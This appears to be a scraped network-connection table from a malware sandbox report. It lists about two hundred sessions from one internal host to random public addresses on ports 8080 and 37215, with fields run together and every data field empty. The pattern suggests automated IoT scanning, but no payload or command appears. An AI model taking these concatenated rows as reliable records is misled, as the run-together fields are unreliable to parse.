                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11316192.168.2.2339434113.233.191.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11317192.168.2.2342548204.206.3.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11318192.168.2.2346254134.84.123.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11319192.168.2.2333286106.0.193.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11320192.168.2.2339358139.72.216.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11321192.168.2.2336920194.111.75.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11322192.168.2.2354600129.45.186.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11323192.168.2.233647013.34.112.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11324192.168.2.235145077.0.39.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11325192.168.2.23330822.84.244.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11326192.168.2.2340688124.69.19.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11327192.168.2.2350502113.194.180.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11328192.168.2.2358006174.185.44.2488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11329192.168.2.233721248.44.234.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11330192.168.2.2336090122.167.113.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11331192.168.2.233370494.122.45.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11332192.168.2.2339348108.21.246.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11333192.168.2.2346676154.48.10.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11334192.168.2.2342648118.126.122.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11335192.168.2.2349520206.172.186.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11336192.168.2.2339204110.104.164.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11337192.168.2.2342728151.42.37.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11338192.168.2.2353652121.96.121.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11339192.168.2.2360560113.65.221.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11340192.168.2.2348036196.247.208.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11341192.168.2.2343086164.18.39.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11342192.168.2.234289895.70.174.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11343192.168.2.233827497.66.243.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11344192.168.2.2338086223.157.92.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11345192.168.2.2341336165.157.165.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11346192.168.2.2334804100.50.63.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11347192.168.2.2351530202.173.120.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11348192.168.2.2337986166.63.109.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11349192.168.2.235716427.237.43.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11350192.168.2.2357716135.96.207.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11351192.168.2.23519382.188.199.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11352192.168.2.2337118161.0.161.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11353192.168.2.235486440.201.165.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11354192.168.2.234893640.44.110.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11355192.168.2.2346946138.69.72.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11356192.168.2.2352918200.92.6.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11357192.168.2.23391204.90.232.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11358192.168.2.2354648118.140.192.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11359192.168.2.2334976132.157.59.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11360192.168.2.234200050.150.18.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11361192.168.2.233409046.248.24.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11362192.168.2.236059463.138.245.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11363192.168.2.2341866218.119.210.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11364192.168.2.2353302199.172.104.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11365192.168.2.235128258.22.41.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11366192.168.2.2346210199.57.129.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11367192.168.2.234372895.95.191.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11368192.168.2.23359509.64.75.478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11369192.168.2.2354314165.186.56.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11370192.168.2.2351634162.32.78.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11371192.168.2.2340246170.95.249.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11372192.168.2.233690645.124.38.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11373192.168.2.234925418.48.20.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11374192.168.2.235146478.4.109.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11375192.168.2.233578842.217.120.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11376192.168.2.2333954208.162.246.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11377192.168.2.2354100162.170.7.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11378192.168.2.233483619.101.54.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11379192.168.2.2334608157.65.174.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11380192.168.2.2346516157.68.176.20037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11381192.168.2.2346590157.255.196.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11382192.168.2.2344186197.156.65.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11383192.168.2.2346996157.247.97.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11384192.168.2.2351210155.2.92.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11385192.168.2.2360152197.202.178.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11386192.168.2.2347398197.205.170.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11387192.168.2.2354538197.243.53.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11388192.168.2.234054241.138.207.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11389192.168.2.2356320104.70.45.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11390192.168.2.2341942197.53.130.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11391192.168.2.2357622197.78.255.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11392192.168.2.234895041.141.215.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11393192.168.2.2341030197.17.199.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11394192.168.2.233936018.33.225.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11395192.168.2.235309041.8.97.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11396192.168.2.2345370157.255.172.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11397192.168.2.2353028199.154.105.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11398192.168.2.236050041.58.105.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11399192.168.2.2346294157.179.180.23037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11400192.168.2.2345524157.84.176.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11401192.168.2.2343908157.207.153.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11402192.168.2.2345012197.30.73.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11403192.168.2.233949641.25.100.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11404192.168.2.235117041.66.60.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11405192.168.2.2351622162.1.48.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11406192.168.2.235662841.250.108.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11407192.168.2.235620841.44.4.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11408192.168.2.2343372157.206.108.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11409192.168.2.2352494197.93.52.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11410192.168.2.23475549.17.3.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11411192.168.2.2344232157.65.95.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11412192.168.2.2335178157.110.50.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11413192.168.2.2357776205.18.174.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11414192.168.2.2360118157.118.252.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11415192.168.2.235446841.232.130.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11416192.168.2.234107241.84.148.14637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11417192.168.2.234519241.206.233.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11418192.168.2.2356700157.138.132.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11419192.168.2.2343284157.61.94.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11420192.168.2.234738241.211.62.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11421192.168.2.2357232150.230.219.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11422192.168.2.2354546102.33.152.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11423192.168.2.2346584157.227.207.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11424192.168.2.234722641.249.114.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11425192.168.2.2336016120.80.242.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11426192.168.2.2351888176.69.156.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11427192.168.2.2343592197.220.186.937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11428192.168.2.2357924151.174.121.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11429192.168.2.233986041.181.48.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11430192.168.2.235390875.116.100.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11431192.168.2.2352470197.21.12.7237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11432192.168.2.2339864197.207.95.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11433192.168.2.2355896193.72.117.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11434192.168.2.2344148157.103.172.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11435192.168.2.233664039.229.93.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11436192.168.2.2342334157.208.210.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11437192.168.2.2338112197.240.235.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11438192.168.2.2352826108.13.217.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11439192.168.2.2347478153.68.155.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11440192.168.2.2358460197.151.6.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11441192.168.2.2353416153.236.137.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11442192.168.2.2346584197.216.224.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11443192.168.2.23437762.35.241.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11444192.168.2.2355548145.60.232.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11445192.168.2.2359508157.182.131.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11446192.168.2.233887041.121.254.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11447192.168.2.2342568157.171.241.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11448192.168.2.234805441.175.120.22937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11449192.168.2.234497441.62.100.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11450192.168.2.2335448112.247.200.11037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11451192.168.2.235309041.121.169.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11452192.168.2.2348084197.26.158.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11453192.168.2.2340588136.204.114.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11454192.168.2.234829041.212.79.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11455192.168.2.2360214157.124.29.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11456192.168.2.235215841.30.118.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11457192.168.2.2337956203.143.10.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11458192.168.2.234792041.236.222.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11459192.168.2.2359422117.77.248.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11460192.168.2.2333746157.227.177.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11461192.168.2.235164441.226.253.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11462192.168.2.2335808157.227.46.25037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11463192.168.2.233297241.244.52.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11464192.168.2.2347888172.52.12.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11465192.168.2.2353780197.152.23.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11466192.168.2.2335762197.199.111.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11467192.168.2.234115041.19.243.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11468192.168.2.2350014177.40.134.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11469192.168.2.2350862157.233.206.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11470192.168.2.2351832136.164.179.3137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11471192.168.2.2347484197.247.224.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11472192.168.2.2334436157.140.51.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11473192.168.2.234439841.147.128.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11474192.168.2.2337652157.89.107.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11475192.168.2.2346866157.221.156.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11476192.168.2.2357622181.142.82.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11477192.168.2.2341666197.171.131.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11478192.168.2.235305641.208.206.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11479192.168.2.2344412157.184.81.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11480192.168.2.2340784197.111.126.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11481192.168.2.234505441.142.251.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11482192.168.2.2335256186.45.202.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11483192.168.2.235655441.90.230.13037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11484192.168.2.2340326157.246.137.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11485192.168.2.2354248197.199.16.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11486192.168.2.235375241.28.62.20437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11487192.168.2.234744660.104.106.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11488192.168.2.2353928157.20.144.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11489192.168.2.2352592197.95.235.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11490192.168.2.234288845.22.199.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11491192.168.2.2333642197.74.171.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11492192.168.2.2340036157.39.204.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11493192.168.2.233479449.146.105.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11494192.168.2.233612841.113.29.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11495192.168.2.2340832197.48.34.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11496192.168.2.234698441.107.24.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11497192.168.2.233538841.63.70.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11498192.168.2.233479641.247.255.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11499192.168.2.2335808177.82.205.8537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11500192.168.2.233903841.133.183.6637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11501192.168.2.234685041.246.44.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11502192.168.2.2350134175.86.147.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11503192.168.2.2352748157.252.158.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11504192.168.2.2353328157.185.76.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11505192.168.2.2337942157.55.12.19137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11506192.168.2.233413041.70.181.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11507192.168.2.2357660143.30.7.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11508192.168.2.234577441.255.130.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11509192.168.2.234477619.199.75.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11510192.168.2.2352700157.18.196.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11511192.168.2.233641641.113.148.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11512192.168.2.233454813.187.101.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11513192.168.2.2351072169.147.143.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11514192.168.2.2337952157.209.175.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11515192.168.2.2357996157.129.129.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11516192.168.2.2343310197.118.0.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11517192.168.2.235742241.229.126.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11518192.168.2.2358210197.115.157.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11519192.168.2.2338304157.200.44.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11520192.168.2.2336214193.157.164.23637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11521192.168.2.2340062157.50.85.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11522192.168.2.2350962157.151.79.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11523192.168.2.234826041.49.93.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11524192.168.2.235110841.7.140.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
